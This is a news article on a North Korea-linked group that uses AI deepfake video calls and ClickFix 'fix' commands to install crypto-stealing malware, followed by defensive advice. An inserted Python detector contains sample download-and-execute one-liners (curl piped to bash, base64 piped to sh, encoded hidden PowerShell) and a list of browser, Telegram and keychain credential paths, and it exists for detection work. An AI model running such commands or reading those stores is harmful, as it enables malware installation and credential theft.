Synopsis: Google Cloud warns that North Korea-linked hackers are using AI deepfakes and seven malware families to target crypto firms. Fake video calls trick victims into running commands that install data-theft tools.

Cybercriminals with ties to North Korea are launching sophisticated attacks against cryptocurrency companies. These threat actors are using artificial intelligence to make their schemes more convincing. The attacks combine fake video calls and malicious software to steal digital assets.


Google Cloud’s security team has identified a major escalation in these criminal operations. The attackers target cryptocurrency firms, fintech companies, and blockchain developers. Their methods have become more advanced since they started using AI tools.

Hackers Deploy Seven Malware Families in Single Attack

Mandiant researchers uncovered a disturbing trend in recent investigations. A threat group Mandiant tracks as UNC1069 deployed seven different malware families during a single intrusion. This represents a significant expansion of the group's toolkit.

The malware includes two newly identified families named CHROMEPUSH and DEEPBREATH. These programs steal browser data, login credentials, and session tokens. Additionally, they harvest information from messaging apps and password managers.

The attackers also use SILENCELIFT to capture victim data silently. Other tools in their arsenal include SUGARLOADER, WAVESHAPER, and HYPERCALL. Each malware serves a specific purpose in the theft chain.


Mandiant has tracked this North Korean group since 2018. However, their capabilities expanded dramatically in November 2025. That’s when they began incorporating AI-generated content into their attacks.

AI-Powered Deepfakes

The criminals use artificial intelligence to create realistic fake videos. These deepfakes impersonate legitimate cryptocurrency executives and investors. Victims receive meeting invitations through compromised Telegram accounts.

During fake Zoom calls, attackers display AI-generated video feeds. They claim to experience audio or video problems. Then they direct victims to run “troubleshooting commands” on their computers.

These "fixes" are in fact download-and-execute commands. Because the victim pastes them into their own terminal, no attachment, exploit or macro is needed: the command fetches additional malware and launches it with the victim's own privileges. The infection happens quickly and quietly.

The social engineering tactics have become remarkably sophisticated. Attackers first build trust by posing as known contacts. They research their targets thoroughly before making contact. Furthermore, the AI-generated videos appear genuine at first glance.

This technique is known as ClickFix: the attacker presents a bogus error and a "fix", and the target performs the infection step themselves by running a supplied command. It tricks even experienced technology professionals because the commands look like normal technical troubleshooting. Victims don't realize they have installed malware until it's too late.


Cryptocurrency Companies Face Mounting Threats

North Korean threat actors primarily target cryptocurrency and blockchain businesses. They also focus on software developers and venture capital firms. The attacks aim to steal digital assets and sensitive financial information.

The malware extracts data from multiple sources on infected systems. It captures browser cookies, saved passwords, and autofill information. Moreover, it steals Telegram session data and Apple Notes content.

Attackers use stolen credentials to access cryptocurrency wallets directly. They also leverage compromised accounts for future social engineering campaigns. This creates a cycle of ongoing criminal activity.

In June 2025, four North Korean operatives infiltrated crypto firms as freelance developers. They stole $900,000 from multiple startups. Earlier that year, the Lazarus Group executed a $1.4 billion hack of Bybit exchange.

These incidents demonstrate the persistent threat North Korean actors pose. They continuously adapt their methods, from infiltrating firms as fake employees to deepfake-backed social engineering. Consequently, cryptocurrency companies must remain vigilant.

Defenses Against AI-Enhanced Attacks

Security experts recommend several protective measures for cryptocurrency firms. Companies should train employees to recognize suspicious meeting invitations. Staff must never paste or run commands supplied by someone on a call, whoever they appear to be: a legitimate meeting platform never requires terminal commands to fix audio or video.

Organizations need robust endpoint detection and response (EDR) tooling. These tools can flag unusual process chains, such as a terminal spawning a download piped into a shell, and data exfiltration attempts. Regular security audits help identify remaining gaps.
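The two behaviours the article describes, a ClickFix "troubleshooting command" that downloads and executes a payload, and a follow-on stealer reading browser credential stores or Telegram session data, both leave traces in endpoint telemetry. The following detector is an added example written for this page, not Mandiant's code or UNC1069 indicators. The event format, process names, file paths and sample log records are all constructed for illustration; the macOS-style paths are assumptions, and a real deployment would take the field names from whatever EDR or audit source it consumes.

```python
"""
Added example (not from the article): scan process-creation and file-open
events for two behaviours described in the story.

  1. ClickFix-style one-liners that fetch remote content and hand it
     straight to an interpreter (curl | bash, powershell -enc, mshta URL...).
  2. Processes other than the legitimate owner reading browser credential
     stores, Telegram session data, Apple Notes or the keychain.

All records, names and paths below are constructed for the example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Interpreters and launchers commonly fed by download-and-run one-liners.
INTERPRETERS = r"(?:bash|sh|zsh|python3?|node|osascript|powershell|pwsh|cmd|mshta)"

CLICKFIX_PATTERNS = [
    # curl ... | bash      wget -O- ... | sudo sh
    re.compile(rf"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?{INTERPRETERS}\b", re.I),
    # bash -c "$(curl ...)"      eval "$(wget ...)"
    re.compile(rf"(?:eval|{INTERPRETERS})\s+-?c?\s*[\"']?\$\(\s*(?:curl|wget)\b", re.I),
    # powershell -enc <long base64 blob>
    re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b.*\s-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{40,}", re.I),
    # iex (iwr http://...)   Invoke-Expression (Invoke-WebRequest ...)
    re.compile(r"\b(?:iex|Invoke-Expression)\b.*\b(?:iwr|Invoke-WebRequest|curl)\b", re.I),
    # mshta http://...
    re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I),
    # echo <b64> | base64 -d | sh   (decode-then-execute)
    re.compile(rf"base64\s+(?:-d|--decode)[^|]*\|\s*{INTERPRETERS}\b", re.I),
]

# Stores the article says the malware targets. macOS layout is assumed here.
SENSITIVE_PATHS = [
    (re.compile(r"/Library/Application Support/Google/Chrome/.*/(Login Data|Cookies|Web Data)$"), "chrome-credential-store"),
    (re.compile(r"/Library/Application Support/Telegram Desktop/tdata/"), "telegram-session"),
    (re.compile(r"/Library/Group Containers/group\.com\.apple\.notes/NoteStore\.sqlite"), "apple-notes"),
    (re.compile(r"/Library/Keychains/"), "keychain"),
]

# Processes that legitimately own each store; anything else touching it is suspect.
OWNERS = {
    "chrome-credential-store": {"Google Chrome", "Google Chrome Helper"},
    "telegram-session": {"Telegram"},
    "apple-notes": {"Notes"},
    "keychain": {"securityd", "Keychain Access"},
}


@dataclass
class Event:
    kind: str      # "exec" or "file_open"
    process: str   # process/image name
    detail: str    # command line for exec, path for file_open


def classify(ev: Event) -> list[str]:
    """Return alert tags for one event; an empty list means nothing fired."""
    alerts: list[str] = []
    if ev.kind == "exec":
        if any(p.search(ev.detail) for p in CLICKFIX_PATTERNS):
            alerts.append("clickfix-download-and-execute")
    elif ev.kind == "file_open":
        for pat, store in SENSITIVE_PATHS:
            if pat.search(ev.detail) and ev.process not in OWNERS[store]:
                alerts.append(f"credential-store-access:{store}")
    return alerts


def scan(events: list[Event]) -> dict[int, list[str]]:
    """Map event index -> alert tags, only for events that produced an alert."""
    hits: dict[int, list[str]] = {}
    for i, ev in enumerate(events):
        tags = classify(ev)
        if tags:
            hits[i] = tags
    return hits


# Constructed sample telemetry (not real logs); the base64 blob is the
# UTF-16LE encoding of a harmless PowerShell fragment.
SAMPLE_EVENTS = [
    Event("exec", "Terminal", "curl -fsSL https://example.invalid/fix-audio.sh | bash"),
    Event("exec", "Terminal", "git pull origin main"),
    Event("exec", "Terminal", "echo aGVsbG8= | base64 -d | sh"),
    Event("exec", "cmd.exe", "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"),
    Event("file_open", "Google Chrome", "/Users/dev/Library/Application Support/Google/Chrome/Default/Login Data"),
    Event("file_open", "python3", "/Users/dev/Library/Application Support/Google/Chrome/Default/Login Data"),
    Event("file_open", "python3", "/Users/dev/Library/Application Support/Telegram Desktop/tdata/D877F783D5D3EF8C/map0"),
    Event("file_open", "Telegram", "/Users/dev/Library/Application Support/Telegram Desktop/tdata/settings"),
]

if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].process, tags)
```

The first rule set fires on the shape of the command rather than on any URL or hash, which is what makes it useful against a campaign that rotates infrastructure; the cost is that developers who genuinely run `curl | bash` installers will trip it, so in practice the alert is scoped to interactive terminals of non-engineering users or paired with the file-access rule, where a scripting runtime reading Chrome's Login Data or Telegram's tdata directory is rarely legitimate.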

Telegram users should enable the platform's protections, in particular two-step verification (a cloud password on top of the SMS code) and regular review of active sessions, since a stolen session token lets an attacker send invitations from a trusted account without ever logging in. Multi-factor authentication adds an important layer of protection. Companies should verify contact identities through a secondary channel the attacker does not control before joining meetings.

The rise of AI-generated deepfakes makes verification more critical, because a convincing face and voice on a call no longer prove who is on the other end. Trust but verify should be every organization's motto. A simple confirmation call or message over a known-good channel can prevent a devastating breach.

Mandiant continues monitoring UNC1069’s activities closely. The Google Cloud security team provides updated threat intelligence regularly. Organizations can use this information to strengthen their defenses.

The cryptocurrency industry faces an evolving threat landscape. North Korean actors will likely continue refining their techniques. Therefore, constant vigilance and updated security practices remain essential for protection.

Written By Fazal Ul Vahab C H

Author

  • Financial analyst with over 1.5 years of experience covering equity markets, cryptocurrencies, and IPOs, and author of more than 1,600 in-depth articles. His coverage spans publicly listed companies, crypto markets, geopolitical developments, and currency trends. In addition, he has led content development for cryptocurrency platforms, creating educational material on blockchain, DeFi, and NFTs.